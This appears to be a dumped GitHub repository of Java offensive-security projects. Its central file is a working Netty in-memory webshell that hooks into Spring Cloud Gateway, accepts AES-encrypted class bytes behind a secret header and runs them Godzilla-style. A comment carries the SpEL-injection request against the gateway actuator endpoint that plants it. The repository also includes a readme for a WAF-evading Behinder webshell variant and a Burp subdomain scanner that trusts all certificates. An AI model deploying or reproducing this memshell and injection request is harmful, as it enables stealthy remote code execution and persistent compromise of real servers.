├── Cover 冰蝎 ├── data.db ├── readme.md └── skaybx.jar ├── NettyMemshell └── NettyMemshell.java ├── README.md ├── Subdomain ├── BurpExtender.java └── NetStateUtil.java └── burpdemo ├── .idea ├── $PROJECT_FILE$ ├── .gitignore ├── artifacts │ └── burpdemo_jar.xml ├── misc.xml ├── modules.xml ├── qaplug_profiles.xml └── uiDesigner.xml ├── burpdemo.iml └── src ├── META-INF └── MANIFEST.MF ├── Main.java └── burp ├── BurpExtender.java ├── IBurpCollaboratorClientContext.java ├── IBurpCollaboratorInteraction.java ├── IBurpExtender.java ├── IBurpExtenderCallbacks.java ├── IContextMenuFactory.java ├── IContextMenuInvocation.java ├── ICookie.java ├── IExtensionHelpers.java ├── IExtensionStateListener.java ├── IHttpHeader.java ├── IHttpListener.java ├── IHttpRequestResponse.java ├── IHttpRequestResponsePersisted.java ├── IHttpRequestResponseWithMarkers.java ├── IHttpService.java ├── IInterceptedProxyMessage.java ├── IIntruderAttack.java ├── IIntruderPayloadGenerator.java ├── IIntruderPayloadGeneratorFactory.java ├── IIntruderPayloadProcessor.java ├── IMenuItemHandler.java ├── IMessageEditor.java ├── IMessageEditorController.java ├── IMessageEditorTab.java ├── IMessageEditorTabFactory.java ├── IParameter.java ├── IProxyListener.java ├── IRequestInfo.java ├── IResponseInfo.java ├── IResponseKeywords.java ├── IResponseVariations.java ├── IScanIssue.java ├── IScanQueueItem.java ├── IScannerCheck.java ├── IScannerInsertionPoint.java ├── IScannerInsertionPointProvider.java ├── IScannerListener.java ├── IScopeChangeListener.java ├── ISessionHandlingAction.java ├── ITab.java ├── ITempFile.java ├── ITextEditor.java └── Payload.java /Cover 冰蝎/data.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0linlin0/Java/ee5e85855d78e5f34f4940da06b7a0178d85c25d/Cover 冰蝎/data.db -------------------------------------------------------------------------------- /Cover 冰蝎/readme.md: -------------------------------------------------------------------------------- 1 | 去除冰蝎协商密钥部分,增加动态服务端生成模块 2 | 目前只用了冰蝎原有的对称加密,且服务端生成也只给出一种模板 3 | 如果有空后期会改进 4 | ### 我没有找到很合适的waf环境来测试,只是理论上觉得可以,使用效果还请及时反馈,我也想知道好不好用2333 当然也欢迎提出新的思路 1343136599@qq.com 5 | ### 一次尝试而已,大佬勿喷 6 | -------------------------------------------------------------------------------- /Cover 冰蝎/skaybx.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0linlin0/Java/ee5e85855d78e5f34f4940da06b7a0178d85c25d/Cover 冰蝎/skaybx.jar -------------------------------------------------------------------------------- /NettyMemshell/NettyMemshell.java: -------------------------------------------------------------------------------- 1 | package com.example.gatewaydemo; 2 | 3 | import io.netty.buffer.ByteBuf; 4 | import io.netty.buffer.Unpooled; 5 | import io.netty.channel.*; 6 | import io.netty.handler.codec.http.*; 7 | import io.netty.util.CharsetUtil; 8 | import reactor.netty.ChannelPipelineConfigurer; 9 | import reactor.netty.ConnectionObserver; 10 | 11 | import java.io.ByteArrayOutputStream; 12 | import java.lang.reflect.Array; 13 | import java.lang.reflect.Field; 14 | import java.lang.reflect.Method; 15 | import java.net.SocketAddress; 16 | import java.net.URL; 17 | import java.net.URLClassLoader; 18 | import java.util.AbstractMap; 19 | import java.util.Map; 20 | import java.util.Scanner; 21 | 22 | /** 23 | * @auther Skay 24 | * @date 2022/4/19 17:29 25 | * @description 26 | */ 27 | public class NettyMemshell extends ChannelDuplexHandler implements ChannelPipelineConfigurer { 28 | 29 | public NettyMemshell(){ 30 | 31 | } 32 | 33 | 34 | public static String doInject(){ 35 | String msg = "inject-start"; 36 | try { 37 | Method getThreads = Thread.class.getDeclaredMethod("getThreads"); 38 | getThreads.setAccessible(true); 39 | Object threads = getThreads.invoke(null); 40 | 41 | for (int i = 0; i < Array.getLength(threads); i++) { 42 | Object thread = Array.get(threads, i); 43 | if (thread != null && thread.getClass().getName().contains("NettyWebServer")) { 44 | Field _val$disposableServer = thread.getClass().getDeclaredField("val$disposableServer"); 45 | _val$disposableServer.setAccessible(true); 46 | Object val$disposableServer = _val$disposableServer.get(thread); 47 | Field _config = val$disposableServer.getClass().getSuperclass().getDeclaredField("config"); 48 | _config.setAccessible(true); 49 | Object config = _config.get(val$disposableServer); 50 | Field _doOnChannelInit = config.getClass().getSuperclass().getSuperclass().getDeclaredField("doOnChannelInit"); 51 | _doOnChannelInit.setAccessible(true); 52 | _doOnChannelInit.set(config, new NettyMemshell()); 53 | msg = "inject-success"; 54 | } 55 | } 56 | }catch (Exception e){ 57 | msg = "inject-error"; 58 | } 59 | return msg; 60 | } 61 | 62 | String xc = "3c6e0b8a9c15224a"; 63 | String pass = "pass"; 64 | String md5 = md5(pass + xc); 65 | 66 | private static Class defClass(byte[] classbytes)throws Exception{ 67 | URLClassLoader urlClassLoader = new URLClassLoader(new URL[0],Thread.currentThread().getContextClassLoader()); 68 | Method method = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); 69 | method.setAccessible(true); 70 | return (Class) method.invoke(urlClassLoader,classbytes,0,classbytes.length); 71 | } 72 | 73 | public byte[] x(byte[] s, boolean m) { 74 | try { 75 | javax.crypto.Cipher c = javax.crypto.Cipher.getInstance("AES"); 76 | c.init(m ? 1 : 2, new javax.crypto.spec.SecretKeySpec(xc.getBytes(), "AES")); 77 | return c.doFinal(s); 78 | } catch(Exception e) { 79 | return null; 80 | } 81 | } 82 | public static String md5(String s) { 83 | String ret = null; 84 | try { 85 | java.security.MessageDigest m; 86 | m = java.security.MessageDigest.getInstance("MD5"); 87 | m.update(s.getBytes(), 0, s.length()); 88 | ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase(); 89 | } catch(Exception e) {} 90 | return ret; 91 | } 92 | public static String base64Encode(byte[] bs) throws Exception { 93 | Class base64; 94 | String value = null; 95 | try { 96 | base64 = Class.forName("java.util.Base64"); 97 | Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null); 98 | value = (String) Encoder.getClass().getMethod("encodeToString", new Class[] { 99 | byte[].class 100 | }).invoke(Encoder, new Object[] { 101 | bs 102 | }); 103 | } catch(Exception e) { 104 | try { 105 | base64 = Class.forName("sun.misc.BASE64Encoder"); 106 | Object Encoder = base64.newInstance(); 107 | value = (String) Encoder.getClass().getMethod("encode", new Class[] { 108 | byte[].class 109 | }).invoke(Encoder, new Object[] { 110 | bs 111 | }); 112 | } catch(Exception e2) {} 113 | } 114 | return value; 115 | } 116 | public static byte[] base64Decode(String bs) throws Exception { 117 | Class base64; 118 | byte[] value = null; 119 | try { 120 | base64 = Class.forName("java.util.Base64"); 121 | Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null); 122 | value = (byte[]) decoder.getClass().getMethod("decode", new Class[] { 123 | String.class 124 | }).invoke(decoder, new Object[] { 125 | bs 126 | }); 127 | } catch(Exception e) { 128 | try { 129 | base64 = Class.forName("sun.misc.BASE64Decoder"); 130 | Object decoder = base64.newInstance(); 131 | value = (byte[]) decoder.getClass().getMethod("decodeBuffer", new Class[] { 132 | String.class 133 | }).invoke(decoder, new Object[] { 134 | bs 135 | }); 136 | } catch(Exception e2) {} 137 | } 138 | return value; 139 | } 140 | 141 | @Override 142 | // Step1. 作为一个ChannelPipelineConfigurer给pipline注册Handler 143 | public void onChannelInit(ConnectionObserver connectionObserver, Channel channel, SocketAddress socketAddress) { 144 | ChannelPipeline pipeline = channel.pipeline(); 145 | // 将内存马的handler添加到spring层handler的前面 146 | pipeline.addBefore("reactor.left.httpTrafficHandler","memshell_handler",new NettyMemshell()); 147 | } 148 | 149 | 150 | private static ThreadLocal> requestThreadLocal = new ThreadLocal<>(); 151 | private static Class payload; 152 | 153 | @Override 154 | // Step2. 作为Handler处理请求,在此实现内存马的功能逻辑 155 | public void channelRead(ChannelHandlerContext ctx, Object msg) throws Exception { 156 | if (msg instanceof HttpRequest){ 157 | HttpRequest httpRequest = (HttpRequest) msg; 158 | if (!httpRequest.headers().contains("skay")){ 159 | ctx.fireChannelRead(msg); 160 | return; 161 | } 162 | AbstractMap.SimpleEntry simpleEntry = new AbstractMap.SimpleEntry(httpRequest,new ByteArrayOutputStream()); 163 | requestThreadLocal.set(simpleEntry); 164 | }else if(msg instanceof HttpContent){ 165 | HttpContent httpContent = (HttpContent)msg; 166 | AbstractMap.SimpleEntry simpleEntry = requestThreadLocal.get(); 167 | if (simpleEntry == null){ 168 | return; 169 | } 170 | HttpRequest httpRequest = simpleEntry.getKey(); 171 | ByteArrayOutputStream contentBuf = simpleEntry.getValue(); 172 | 173 | ByteBuf byteBuf = httpContent.content(); 174 | int size = byteBuf.capacity(); 175 | byte[] requestContent = new byte[size]; 176 | byteBuf.getBytes(0,requestContent,0,requestContent.length); 177 | 178 | contentBuf.write(requestContent); 179 | 180 | if (httpContent instanceof LastHttpContent){ 181 | try { 182 | byte[] data = x(contentBuf.toByteArray(), false); 183 | 184 | if (payload == null) { 185 | payload = defClass(data); 186 | send(ctx,x(new byte[0], true),HttpResponseStatus.OK); 187 | } else { 188 | Object f = payload.newInstance(); 189 | //初始化内存流 190 | java.io.ByteArrayOutputStream arrOut = new java.io.ByteArrayOutputStream(); 191 | //将内存流传递给哥斯拉的payload 192 | f.equals(arrOut); 193 | //将解密后的数据传递给哥斯拉Payload 194 | f.equals(data); 195 | //通知哥斯拉Payload执行shell逻辑 196 | f.toString(); 197 | //调用arrOut.toByteArray()获取哥斯拉Payload的输出 198 | send(ctx,x(arrOut.toByteArray(), true),HttpResponseStatus.OK); 199 | } 200 | } catch(Exception e) { 201 | ctx.fireChannelRead(httpRequest); 202 | } 203 | }else { 204 | ctx.fireChannelRead(msg); 205 | } 206 | 207 | } 208 | 209 | } 210 | 211 | 212 | private void send(ChannelHandlerContext ctx, byte[] context, HttpResponseStatus status) { 213 | FullHttpResponse response = new DefaultFullHttpResponse(HttpVersion.HTTP_1_1, status, Unpooled.copiedBuffer(context)); 214 | response.headers().set(HttpHeaderNames.CONTENT_TYPE, "text/plain; charset=UTF-8"); 215 | ctx.writeAndFlush(response).addListener(ChannelFutureListener.CLOSE); 216 | } 217 | } 218 | 219 | /* 220 | POST /actuator/gateway/routes/shell HTTP/1.1 221 | Host: localhost:8080 222 | Accept-Encoding: gzip, deflate 223 | Accept-Language: en 224 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 225 | Connection: close 226 | Content-Type: application/json 227 | Content-Length: 13901 228 | 229 | { 230 | "id": "hacktest", 231 | "filters": [{ 232 | "name": "AddResponseHeader", 233 | "args": { 234 | "name": "Result", 235 | "value": "#{T(org.springframework.cglib.core.ReflectUtils).defineClass('NettyMemshell',T(org.springframework.util.Base64Utils).decodeFromString('classbase64'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()}" 236 | } 237 | }], 238 | "uri": "http://example.com" 239 | } 240 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 一些Java相关的项目 2 | ## BurpExtender 3 | Subdomain demo 4 | 5 | ## Cover 冰蝎 by Skay 6 | 去除掉 冰蝎协商密钥部分,动态生成服务端 7 | -------------------------------------------------------------------------------- /Subdomain/BurpExtender.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | import java.awt.Component; 4 | import java.awt.event.MouseAdapter; 5 | import java.awt.event.MouseEvent; 6 | import java.io.PrintWriter; 7 | import javax.swing.SwingUtilities; 8 | import javax.swing.event.ListSelectionEvent; 9 | import javax.swing.event.ListSelectionListener; 10 | import javax.swing.JMenuItem; 11 | import java.util.ArrayList; 12 | import java.util.Arrays; 13 | import java.util.List; 14 | import java.io.File; 15 | import java.io.FileNotFoundException; 16 | import java.util.Scanner; 17 | import javax.swing.JFileChooser; 18 | import javax.swing.ListModel; 19 | 20 | import burp.NetStateUtil; 21 | 22 | public class BurpExtender extends javax.swing.JFrame implements IBurpExtender, IHttpListener,ITab,IContextMenuFactory{ 23 | 24 | public PrintWriter stdout; 25 | public IExtensionHelpers hps; 26 | public IBurpExtenderCallbacks cbs; 27 | 28 | private javax.swing.JButton jButton1; 29 | private javax.swing.JButton jButton2; 30 | private javax.swing.JButton jButton3; 31 | private javax.swing.JList jList2; 32 | private javax.swing.JPanel jPanel1; 33 | private javax.swing.JScrollPane jScrollPane1; 34 | private javax.swing.JScrollPane jScrollPane3; 35 | private javax.swing.JTable jTable1; 36 | private IContextMenuInvocation invocation; 37 | private JFileChooser jfc=new JFileChooser(new File(".")); 38 | public Object[][] result; 39 | public ArrayList dict; 40 | public String choseddomain; 41 | 42 | 43 | 44 | @Override 45 | public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) { 46 | 47 | callbacks.setExtensionName("linlintest"); 48 | callbacks.registerContextMenuFactory(this); 49 | 50 | this.hps = callbacks.getHelpers(); 51 | this.cbs = callbacks; 52 | this.stdout = new PrintWriter(callbacks.getStdout(), true); 53 | 54 | this.stdout.println("hello burp!"); 55 | 56 | SwingUtilities.invokeLater(new Runnable() { 57 | @Override 58 | public void run() { 59 | jPanel1 = new javax.swing.JPanel(); 60 | jScrollPane3 = new javax.swing.JScrollPane(); 61 | jList2 = new javax.swing.JList(); 62 | jButton1 = new javax.swing.JButton(); 63 | jScrollPane1 = new javax.swing.JScrollPane(); 64 | jTable1 = new javax.swing.JTable(); 65 | jButton2 = new javax.swing.JButton(); 66 | jButton3 = new javax.swing.JButton(); 67 | 68 | setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE); 69 | 70 | jList2.setModel(new javax.swing.AbstractListModel() { 71 | String[] strings = { }; 72 | public int getSize() { return strings.length; } 73 | public Object getElementAt(int i) { return strings[i]; } 74 | }); 75 | jScrollPane3.setViewportView(jList2); 76 | 77 | jButton1.setText("批量导入"); 78 | jButton1.addMouseListener(new MouseAdapter() { 79 | 80 | @Override 81 | public void mouseClicked(MouseEvent e){//这里是具体功能实现代码 涉及到文件操作 82 | jfc.showOpenDialog(jPanel1); 83 | File file = jfc.getSelectedFile(); 84 | Scanner scanner = null; 85 | try { 86 | scanner = new Scanner(file); 87 | } catch (FileNotFoundException e1) { 88 | // TODO Auto-generated catch block 89 | e1.printStackTrace(); 90 | } 91 | ArrayList listarry = new ArrayList(); 92 | while(scanner.hasNextLine()) 93 | { 94 | 95 | String str=scanner.nextLine();//逐行读取文件 96 | listarry.add(str); 97 | } 98 | //把读取的数据存到文本框中 99 | String[] listData=(String[]) listarry.toArray(new String[listarry.size()]); 100 | jList2.setListData(listData); 101 | } 102 | 103 | }); 104 | 105 | jTable1.setModel(new javax.swing.table.DefaultTableModel( 106 | new Object [][] { 107 | {null, null, null}, 108 | {null, null, null}, 109 | {null, null, null}, 110 | {null, null, null}, 111 | {null, null, null}, 112 | {null, null, null}, 113 | {null, null, null}, 114 | {null, null, null}, 115 | {null, null, null}, 116 | {null, null, null}, 117 | {null, null, null}, 118 | {null, null, null}, 119 | {null, null, null}, 120 | {null, null, null}, 121 | {null, null, null}, 122 | {null, null, null}, 123 | {null, null, null}, 124 | {null, null, null}, 125 | {null, null, null}, 126 | {null, null, null} 127 | }, 128 | new String [] { 129 | "域名", "是否存在", "url" 130 | } 131 | ) { 132 | Class[] types = new Class [] { 133 | java.lang.String.class, java.lang.String.class, java.lang.String.class 134 | }; 135 | 136 | public Class getColumnClass(int columnIndex) { 137 | return types [columnIndex]; 138 | } 139 | }); 140 | jScrollPane1.setViewportView(jTable1); 141 | 142 | jButton3.setText("start"); 143 | jButton3.addMouseListener(new MouseAdapter() { 144 | @Override 145 | public void mouseClicked(MouseEvent e){ 146 | ArrayList domainsarry = dict; 147 | String[] domains=(String[]) domainsarry.toArray(new String[domainsarry.size()]); 148 | Object[][] theresult=new Object[domains.length][3]; 149 | for (int i = 0; i < domains.length; i++) { 150 | NetStateUtil netStateUtil=new NetStateUtil(i,domains[i]+"."+choseddomain); 151 | Object[] resultrow =netStateUtil.getresult(); 152 | //String[] resultrow = {"aaa","bbb","ccc"}; 153 | theresult[i][0]=resultrow[0]; 154 | theresult[i][1]=resultrow[1]; 155 | theresult[i][2]=resultrow[2]; 156 | } 157 | result=theresult; 158 | } 159 | 160 | }); 161 | 162 | jList2.addListSelectionListener(new ListSelectionListener(){ 163 | 164 | @Override 165 | public void valueChanged(ListSelectionEvent e) { 166 | // TODO Auto-generated method stub 167 | int[] indices = jList2.getSelectedIndices(); 168 | // 获取选项数据的 ListModel 169 | ListModel listModel = jList2.getModel(); 170 | // 输出选中的选项 171 | choseddomain=listModel.getElementAt(indices[0]); 172 | 173 | jTable1.setModel(new javax.swing.table.DefaultTableModel( 174 | result, 175 | new String [] { 176 | "域名", "是否存在", "url" 177 | } 178 | ) { 179 | Class[] types = new Class [] { 180 | java.lang.String.class, java.lang.String.class, java.lang.String.class 181 | }; 182 | 183 | public Class getColumnClass(int columnIndex) { 184 | return types [columnIndex]; 185 | } 186 | }); 187 | }}); 188 | 189 | jButton2.setText("导入字典"); 190 | jButton2.addMouseListener(new MouseAdapter() { 191 | @Override 192 | public void mouseClicked(MouseEvent e){ 193 | jfc.showOpenDialog(jPanel1); 194 | File file = jfc.getSelectedFile(); 195 | Scanner scanner = null; 196 | try { 197 | scanner = new Scanner(file); 198 | } catch (FileNotFoundException e1) { 199 | // TODO Auto-generated catch block 200 | e1.printStackTrace(); 201 | } 202 | ArrayList listarry = new ArrayList(); 203 | while(scanner.hasNextLine()) 204 | { 205 | 206 | String str=scanner.nextLine(); 207 | listarry.add(str); 208 | } 209 | //把读取的数据存到文本框中 210 | dict=listarry; 211 | } 212 | 213 | }); 214 | 215 | 216 | javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1); 217 | jPanel1.setLayout(jPanel1Layout); 218 | jPanel1Layout.setHorizontalGroup( 219 | jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) 220 | .addGroup(jPanel1Layout.createSequentialGroup() 221 | .addContainerGap() 222 | .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) 223 | .addComponent(jScrollPane3, javax.swing.GroupLayout.PREFERRED_SIZE, 85, javax.swing.GroupLayout.PREFERRED_SIZE) 224 | .addComponent(jButton1)) 225 | .addGap(8, 8, 8) 226 | .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) 227 | .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, jPanel1Layout.createSequentialGroup() 228 | .addComponent(jButton2) 229 | .addGap(149, 149, 149) 230 | .addComponent(jButton3) 231 | .addGap(18, 18, 18)) 232 | .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, jPanel1Layout.createSequentialGroup() 233 | .addComponent(jScrollPane1, javax.swing.GroupLayout.DEFAULT_SIZE, 462, Short.MAX_VALUE) 234 | .addContainerGap()))) 235 | ); 236 | jPanel1Layout.setVerticalGroup( 237 | jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) 238 | .addGroup(jPanel1Layout.createSequentialGroup() 239 | .addContainerGap() 240 | .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) 241 | .addComponent(jScrollPane3, javax.swing.GroupLayout.DEFAULT_SIZE, 253, Short.MAX_VALUE) 242 | .addComponent(jScrollPane1, javax.swing.GroupLayout.PREFERRED_SIZE, 0, Short.MAX_VALUE)) 243 | .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) 244 | .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) 245 | .addComponent(jButton1) 246 | .addComponent(jButton2) 247 | .addComponent(jButton3)) 248 | .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)) 249 | ); 250 | 251 | javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane()); 252 | getContentPane().setLayout(layout); 253 | layout.setHorizontalGroup( 254 | layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) 255 | .addGroup(layout.createSequentialGroup() 256 | .addContainerGap() 257 | .addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) 258 | .addContainerGap()) 259 | ); 260 | layout.setVerticalGroup( 261 | layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) 262 | .addGroup(layout.createSequentialGroup() 263 | .addContainerGap() 264 | .addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) 265 | .addContainerGap()) 266 | ); 267 | 268 | 269 | // 设置自定义组件并添加标签 270 | cbs.customizeUiComponent(jPanel1); 271 | 272 | cbs.addSuiteTab(BurpExtender.this); 273 | 274 | ///aaa 275 | } 276 | }); 277 | } 278 | 279 | // 实现 ITab 接口的 getTabCaption 方法 280 | public String getTabCaption() { 281 | return "linlin"; 282 | } 283 | 284 | // 实现 ITab 接口的 getUiComponent 方法 285 | @Override 286 | public Component getUiComponent() { 287 | return jPanel1; 288 | } 289 | 290 | public static void main(String[] args) { 291 | 292 | } 293 | 294 | public List createMenuItems(final IContextMenuInvocation invocation) { 295 | if(invocation.getToolFlag() == IBurpExtenderCallbacks.TOOL_TARGET){ 296 | JMenuItem menuItem = new JMenuItem("获取子域"); 297 | IHttpRequestResponse[] somemessage = invocation.getSelectedMessages(); 298 | String[] listData=new String[somemessage.length]; 299 | for (int i = 0; i < somemessage.length; i++) { 300 | IHttpService httpservice = somemessage[i].getHttpService(); 301 | listData[i]=httpservice.getHost(); 302 | //jButton3.setText(httpservice.getHost()); 303 | } 304 | jList2.setListData(listData); 305 | this.invocation = invocation; 306 | 307 | return Arrays.asList(menuItem); 308 | }else { 309 | return null; 310 | } 311 | 312 | } 313 | 314 | 315 | 316 | @Override 317 | public void processHttpMessage(int toolFlag, boolean messageIsRequest, IHttpRequestResponse messageInfo) { 318 | // TODO Auto-generated method stub 319 | 320 | } 321 | } 322 | -------------------------------------------------------------------------------- /Subdomain/NetStateUtil.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | 4 | import java.io.IOException; 5 | import java.net.HttpURLConnection; 6 | import java.net.InetAddress; 7 | import java.net.MalformedURLException; 8 | import java.net.URL; 9 | 10 | import javax.net.ssl.HostnameVerifier; 11 | import javax.net.ssl.HttpsURLConnection; 12 | import javax.net.ssl.SSLSession; 13 | 14 | public class NetStateUtil { 15 | public Object[] result = null; 16 | public String fulldomain; 17 | public NetStateUtil(int i,String fulldomain) { 18 | this.fulldomain=fulldomain; 19 | } 20 | static HostnameVerifier hv = new HostnameVerifier() { 21 | public boolean verify(String urlHostName, SSLSession session) { 22 | return true; 23 | } 24 | }; 25 | public Object[] getresult() { 26 | String remoteInetAddr1="http://"+fulldomain; 27 | String remoteInetAddr2="https://"+fulldomain; 28 | connectingAddress(remoteInetAddr1); 29 | connectingAddress(remoteInetAddr2); 30 | return result; 31 | } 32 | public void connectingAddress(String remoteInetAddr){ 33 | Object[] theresult=new Object[3]; 34 | boolean flag=false; 35 | String tempUrl=remoteInetAddr.substring(0, 5);//取出地址前5位 36 | if(tempUrl.contains("http")){//判断传过来的地址中是否有http 37 | if(tempUrl.equals("https")){//判断服务器是否是https协议 38 | try { 39 | trustAllHttpsCertificates();//当协议是https时 40 | } catch (Exception e) { 41 | e.printStackTrace(); 42 | } 43 | HttpsURLConnection.setDefaultHostnameVerifier(hv);//当协议是https时 44 | } 45 | flag=isConnServerByHttp(remoteInetAddr); 46 | }else{//传过来的是IP地址 47 | flag=isReachable(remoteInetAddr); 48 | } 49 | if(flag){ 50 | theresult[0]= fulldomain; 51 | theresult[1]= "可访问"; 52 | theresult[2]= remoteInetAddr; 53 | }else{ 54 | theresult[0]= fulldomain; 55 | theresult[1]= "false"; 56 | theresult[2]= "空"; 57 | } 58 | 59 | result=theresult; 60 | } 61 | /** 62 | * 传入需要连接的IP,返回是否连接成功 63 | * 64 | * @param remoteInetAddr 65 | * @return 66 | */ 67 | public static boolean isReachable(String remoteInetAddr) {// IP地址是否可达,相当于Ping命令 68 | boolean reachable = false; 69 | try { 70 | InetAddress address = InetAddress.getByName(remoteInetAddr); 71 | reachable = address.isReachable(1500); 72 | } catch (Exception e) { 73 | e.printStackTrace(); 74 | } 75 | return reachable; 76 | } 77 | 78 | public static boolean isConnServerByHttp(String serverUrl) {// 服务器是否开启 79 | boolean connFlag = false; 80 | URL url; 81 | HttpURLConnection conn = null; 82 | try { 83 | url = new URL(serverUrl); 84 | conn = (HttpURLConnection) url.openConnection(); 85 | conn.setConnectTimeout(3 * 1000); 86 | if (conn.getResponseCode() == 200) {// 如果连接成功则设置为true 87 | connFlag = true; 88 | } 89 | } catch (MalformedURLException e) { 90 | e.printStackTrace(); 91 | } catch (IOException e) { 92 | e.printStackTrace(); 93 | } finally { 94 | conn.disconnect(); 95 | } 96 | return connFlag; 97 | } 98 | /*以下是Https适用*/ 99 | private static void trustAllHttpsCertificates() throws Exception { 100 | javax.net.ssl.TrustManager[] trustAllCerts = new javax.net.ssl.TrustManager[1]; 101 | javax.net.ssl.TrustManager tm = new miTM(); 102 | trustAllCerts[0] = tm; 103 | javax.net.ssl.SSLContext sc = javax.net.ssl.SSLContext 104 | .getInstance("SSL"); 105 | sc.init(null, trustAllCerts, null); 106 | javax.net.ssl.HttpsURLConnection.setDefaultSSLSocketFactory(sc 107 | .getSocketFactory()); 108 | } 109 | 110 | static class miTM implements javax.net.ssl.TrustManager, 111 | javax.net.ssl.X509TrustManager { 112 | public java.security.cert.X509Certificate[] getAcceptedIssuers() { 113 | return null; 114 | } 115 | 116 | public boolean isServerTrusted( 117 | java.security.cert.X509Certificate[] certs) { 118 | return true; 119 | } 120 | 121 | public boolean isClientTrusted( 122 | java.security.cert.X509Certificate[] certs) { 123 | return true; 124 | } 125 | 126 | public void checkServerTrusted( 127 | java.security.cert.X509Certificate[] certs, String authType) 128 | throws java.security.cert.CertificateException { 129 | return; 130 | } 131 | 132 | public void checkClientTrusted( 133 | java.security.cert.X509Certificate[] certs, String authType) 134 | throws java.security.cert.CertificateException { 135 | return; 136 | } 137 | } 138 | // public static Object[][] main(String[] args) { 139 | //// String domains[] = {"Jimmy","Gougou","Doggy"}; 140 | //// for (int i = 0; i < domains.length; i++) { 141 | //// NetStateUtil netStateUtil=new NetStateUtil(i,domains[i]+".baidu.com"); 142 | //// netStateUtil.getresult(); 143 | //// } 144 | // return result; 145 | // 146 | // } 147 | } 148 | /*以上是Https适用*/ 149 | 150 | -------------------------------------------------------------------------------- /burpdemo/.idea/$PROJECT_FILE$: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 8 | 9 | 11 | -------------------------------------------------------------------------------- /burpdemo/.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # Default ignored files 2 | /shelf/ 3 | /workspace.xml 4 | # Editor-based HTTP Client requests 5 | /httpRequests/ 6 | # Datasource local storage ignored files 7 | /dataSources/ 8 | /dataSources.local.xml 9 | -------------------------------------------------------------------------------- /burpdemo/.idea/artifacts/burpdemo_jar.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | $PROJECT_DIR$/out/artifacts/burpdemo_jar 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /burpdemo/.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 9 | -------------------------------------------------------------------------------- /burpdemo/.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /burpdemo/.idea/qaplug_profiles.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 12 | -------------------------------------------------------------------------------- /burpdemo/.idea/uiDesigner.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | -------------------------------------------------------------------------------- /burpdemo/burpdemo.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /burpdemo/src/META-INF/MANIFEST.MF: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Main-Class: Main 3 | 4 | -------------------------------------------------------------------------------- /burpdemo/src/Main.java: -------------------------------------------------------------------------------- 1 | /** 2 | * @auther Skay 3 | * @date 2022/1/7 11:33 4 | * @description 5 | */ 6 | public class Main { 7 | public static void main(String[] args) { 8 | System.out.println("aaa"); 9 | } 10 | } 11 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IBurpCollaboratorClientContext.java: 